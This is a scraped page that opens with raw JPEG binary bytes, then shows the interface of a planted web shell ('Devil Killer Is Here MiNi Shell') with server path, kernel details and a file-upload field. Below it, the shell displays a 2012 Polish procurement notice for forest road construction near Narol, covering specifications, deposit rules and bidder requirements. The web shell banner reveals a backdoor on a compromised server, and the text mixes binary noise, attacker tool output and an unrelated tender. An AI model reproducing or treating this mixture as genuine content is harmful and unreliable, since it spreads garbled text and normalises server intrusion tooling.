JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/151727-N-2012.html

<p class="kh_header"><b>Narol: Budowa i przebudowa dróg leśnych na terenie Leśnictw Gorajec, Płazów, Wola Wielka</b><br>
<b>Numer ogłoszenia: 151727 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Narol , ul. Bohaterów Września 1939 roku 38, 37-610 Narol, woj. podkarpackie, tel. 016 6317020, faks 016 6317020.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_narol/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa i przebudowa dróg leśnych na terenie Leśnictw Gorajec, Płazów, Wola Wielka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: budowa i przebudowa dróg leśnych na terenie Nadleśnictwa Narol, które ze względów organizacyjnych podzielono na 3 części:

Część I: Budowa drogi leśnej Leśnictwo Gorajec w km 0+000 - 1+547, 1+547 - 2+650, nr inw. IN/2011/24,  
Część II: Przebudowa drogi leśnej Leśnictwo Płazów w km 0+000 - 2+015, nr inw. IN/2012/27, 
Część III: Przebudowa drogi leśnej Leśnictwo Wola Wielka w km 0+000 - 5+040, 
                                                 


Część I: Budowa drogi leśnej w Leśnictwie Gorajec w km 0+000-1+547, w km 1+547                   -2+650, nr inw. IN/2011/24. 

OPIS PRAC
1. Charakterystyka techniczna
- kategoria ruchu KR1-2
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
-obciążenie 80KN/oś
- teren równinny
- przekrój poprzeczny szlakowy km 0 + 000 - km 2+650
- szerokość jezdni km 0 + 000 - km 2+650 - 3,50 m
- szerokość pobocza ziemnego str. L i P - 1.50m
- projektowana nawierzchnia drogi tłuczniowa zamknięta powierzchniowym utrwaleniem
-projektowana podbudowa z tłucznia
- projektowane mijanki wg Tabeli mijanek
- projektowane zjazdy wg Tabeli zjazdów
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych                           i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres budowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0 + 000 krawędź drogi leśnej utwardzonej
- KPO km 2+650,
Projektowana budowa drogi leśnej znajduje się w całości w granicach pasa drogowego stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 10m - 12m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu
uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano przebiegiem istniejącej drogi.
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp do 1.5. Spadki poprzeczne na mijankach i 1%.
5. Konstrukcja nawierzchni obliczona na podstawie badań geologicznych
Projektowana nawierzchnia km 0 + 000 - km 0+600, 1+200-2+300
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
Projektowana nawierzchnia km 0+600-1+200
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 10cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15 cm stabilizacja gruntu cementem o Rm= 2.5 MPa
- 15cm warstwa odsączająca z piasku
Projektowana nawierzchnia 2+300-2+650
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 10cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 15cm dolna warstwa podbudowy z tłucznia 63/80
- 15 cm stabilizacja gruntu cementem o Rm= 2.5 MPa
- 30cm warstwa odsączająca z piasku
Projektowana nawierzchnia mijanek
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
Nawierzchnia zjazdów
- dwukrotne powierzchniowe utrwalenie emulsją i grysem
- 15cm górna warstwa nawierzchni z tłucznia 20/63 z zaklinowaniem
- 20cm dolna warstwa podbudowy z tłucznia 63/80
- 15cm warstwa odsączająca z piasku
6. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 2+650str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 10m - 12m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren lub do istniejącego cieku wodnych.
7. Zjazdy
Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P.
8. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12cm i szer. 0.50m
9. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg tabeli przepustów.
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe.
10. Oznakowanie pionowe
W celu zapewnienia bezpieczeństwa ruch projektuje się ustawienie słupków i tablic znaku.
km 0 + 050 str. L znak A - 7, słupek stalowy
km 0 + 050 str.P znak B-33, słupek stalowy
Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gminy Cieszanów. 


Cz. 2 - Przebudowa drogi leśnej Leśnictwo Płazów w km 0+000 - 2+015, nr inw. IN/2012/27.

OPIS PRAC

1. Charakterystyka techniczna
- kategoria ruchu KR1-2
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
- teren równinny
-obciążenie 80 KN/oś
- przekrój poprzeczny szlakowy km 0 + 000 - km 2+015
- szerokość pobocza ziemnego str. L i P do 1.50m
- projektowana nawierzchnia tłuczniowa
- projektowane mijanki wg Tabeli mijanek, szer. 2,5m dł. (40+25)/2x2,5m + skosy wjazdowe               i zjazdowe
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych                             i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0+000 granica drogi leśnej asfaltowej
- KPO km 2+015krawędź skrzyżowania dróg leśnych
Projektowana przebudowa drogi leśnej znajduje się w całości w granicach pasa drogowego
stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 11m - 12m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu
uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano
przebiegiem istniejącej drogi .
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg Projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1.5. Spadki poprzeczne na mijankach 2%.
Projektowana nawierzchnia km 0 + 000 - km 1+100, km
- 15 cm warstwa odsączająca z piasku o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia km 1+100, km km 2 +015
- 15 cm warstwa odsączająca o parametrach G1
- stabilizacja gruntu cementem 15 cm
-20 cm dolna warstwa podbudowy z tłucznia
-10 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia mijanek
- 15 cm warstwa odsączająca o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Nawierzchnia zjazdów
15 cm warstwa odsączająca o parametrach G1
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
5. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 3+190str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 11m - 12m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren
6. Zjazdy
Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy , roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P.
7. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12 cm i szer. 0.50m
8. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg tabeli przepustów
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe.
9. Oznakowanie pionowe
W celu zapewnienia bezpieczeństwa ruch projektuje się ustawienie słupków i tablic znaku.
km 0 + 050 str. L znak A - 7, słupek stalowy
km 1+965 str. P znak A - 7, słupek stalowy
km 0 + 050 str. P znak B-33, słupek stalowy
km 1+945 str. P znak B-33, słupek stalowy


Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gminy Narol. 


Cz. 3 - Przebudowa drogi leśnej Leśnictwo Wola Wielka w km 0+000 - 5+040, 

Opis prac
1. Charakterystyka techniczna
- droga wewnętrzna administrator Nadleśnictwo Narol
- prędkość projektowa 30km/h
- teren równinny
-obciążenie 80 KN/oś
- przekrój poprzeczny szlakowy km 0 + 000 - km 5+040
- szerokość pobocza ziemnego str. L i P do 1.0m
- projektowana nawierzchnia tłuczniowa
- projektowane mijanki wg Tabeli mijanek szer. 2,5m dł. (40+25)/2x2,5m + skosy wjazdowe i zjazdowe
- odwodnienie drogi system rowów otwartych, przepustów oraz spadków podłużnych i poprzecznych
- charakter ruchu obsługa Nadleśnictwa Narol
2. Trasa
Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0+000 granica drogi powiatowej
- KPO km 5+040, krawędź skrzyżowania droga gminna
Projektowana przebudowa drogi leśnej znajduje się w całości w granicach pasa drogowego
stanowiącego własność Nadleśnictwa Narol. Szerokość pasa drogowego 10-11m.
3. Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi leśnej dostosowano do istniejącego terenu uwzględniając roboty ziemne i spadki podłużne drogi. Spadki podłużne i poprzeczne niwelety uwarunkowano  przebiegiem istniejącej drogi .
4. Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%.
Na łukach jednostronny (spadki na łukach poziomych przyjąć wg Projektu technicznego), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1.5. Spadki poprzeczne na mijankach i na składach drzewa 1%.
Projektowana nawierzchnia km 0 + 000 - km 0+300, i w km 0+900-1+300
- 15 cm warstwa odsączająca
- geowłóknina
- 20 cm dolna warstwa podbudowy z tłucznia
- 15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia km 0 + 300 -0+900 i w km 1+300-5+040
- 15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Projektowana nawierzchnia mijanek i składów drzewa
- 15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
Nawierzchnia zjazdów
15 cm warstwa odsączająca
-20 cm dolna warstwa podbudowy z tłucznia
-15 cm górna warstwa z tłucznia z zaklinowaniem
5. Rowy
W celu poprawy spływu wód opadowych z przyległego terenu projektuje się następujące roboty:
- wykonanie rowów km 0 + 000 - km 5+040 str. L i P, projektuje się rowy trapezowe szerokość dna rowu 0.40m, pochylenie skarp od do 1 : 1.5, 
- w celu likwidacji załamań trasy i uzyskania pasa drogowego 10m - 11m projektuje się wykonanie karczowania krzaków i pni drzew.
Woda z rowów zostanie odprowadzona w teren lub do istniejącego cieku wodnych.
6. Zjazdy
Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy , roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P z betonu.
7. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12 cm i szer. 0.50m
8. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg. tabeli przepustów
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe z betonu.

Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gmin: Horyniec Zdrój, Narol. 

Szczegółowy opis przedmiotu zamówienia zawarty jest w Dokumentacji projektowej, Specyfikacjach technicznych wykonania i odbioru robót (zał. nr 6) oraz Przedmiarze robót stanowiącym załącznik nr 2 do SIWZ.

Wymienione powyżej opracowania stanowią integralną część SIWZ, a wszystkie wskazane w nich, poprzez zamieszczenie znaków towarowych, patentów lub pochodzenia, materiały (wyroby) i urządzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, w odniesieniu do materiałów (wyrobów) i urządzeń wskazanych z nazwy Zamawiający dopuszcza zastosowanie materiałów (wyrobów), tj. o jakości nie gorszej niż opisana w Dokumentacji projektowej oraz Specyfikacjach technicznych wykonania i odbioru robót budowlanych (STWiORB)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w następującej wysokości:                                   - dla Części I - 14 000,00 zł. (słownie: czternaście tysięcy złotych),                                                 - dla Części II - 10 500, 00 zł. (słownie: dziesięć tysięcy pięćset złotych),                                                      - dla Części III - 18 000, 00 zł. (słownie: osiemnaście tysięcy złotych), które wnosi się przed upływem terminu składania ofert (art. 45 ust. 2,3 i 4 Ustawy).
Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.), art. 45 ust.6 Ustawy.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w: PKO BP Lubaczów 47102042870000280200614925 , z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. (art. 45 ust.7 Ustawy). 
Wadium wnoszone w formach, o których mowa powyżej należy złożyć w formie oryginału w kasie Zamawiającego. 
Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie składania ofert znajdzie się na rachunku bankowym Zamawiającego, tj. do dnia 27.07.2012 r. do godz. 10.00.
Wykonawca, który nie wniesie wadium w terminie składania ofert w jednej z form, o których mowa powyżej zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą (art. 24 ust. 2 pkt. 2, art. 24 ust. 4 Ustawy).
Na podstawie art. 46 Ustawy, Zamawiający zwróci wadium:
1)	wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy,
2)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy,
3)	niezwłocznie, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zatrzymuje wadium wraz z odsetkami (art. 46 ust. 4a i 5 Ustawy), jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wymieniony powyżej Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną w zakresie budowy lub przebudowy lub remontu drogi o wartości nie niższej niż: 
- dla części I - 500 000.  00 zł. (słownie: pięćset tysięcy złotych),
- dla części II - 400 000. 00 zł (słownie: czterysta tysięcy złotych),
- dla części III - 900 000.  00 zł. (słownie: dziewięćset tysięcy złotych),
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa powyżej dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wymieniony powyżej, Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje: 
dla części I - co najmniej: 2 szt.  sam. ciężarowy o ład. min. 10 ton, 2 szt. koparki o poj. łyżki 0,4m3, 1 szt. walec stalowo - gumowy 12 ton, 1 szt. walec stalowy 15 ton, 1 szt. rozścielacz do kruszyw, 
dla części II  - co najmniej: 2 szt.  sam. ciężarowy o ład. min. 10 ton, 2 szt. koparki o poj. łyżki 0,4m3, 1 szt. walec stalowo - gumowy 12 ton, 1 szt. walec stalowy 15 ton, 1 szt. rozścielacz do kruszyw;
dla Części III - co najmniej: 3 szt.  sam. ciężarowe o ład. min 10 ton, 3 szt. koparki o poj. łyżki 0,4m3, 1 szt. walec stalowo - gumowy 12 ton, 1 szt. walec stalowy 15 ton, 1 szt. rozścielacz do kruszyw, wraz z informacją o sposobie dysponowania tymi zasobami.   
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa powyżej dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów i oświadczeń złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
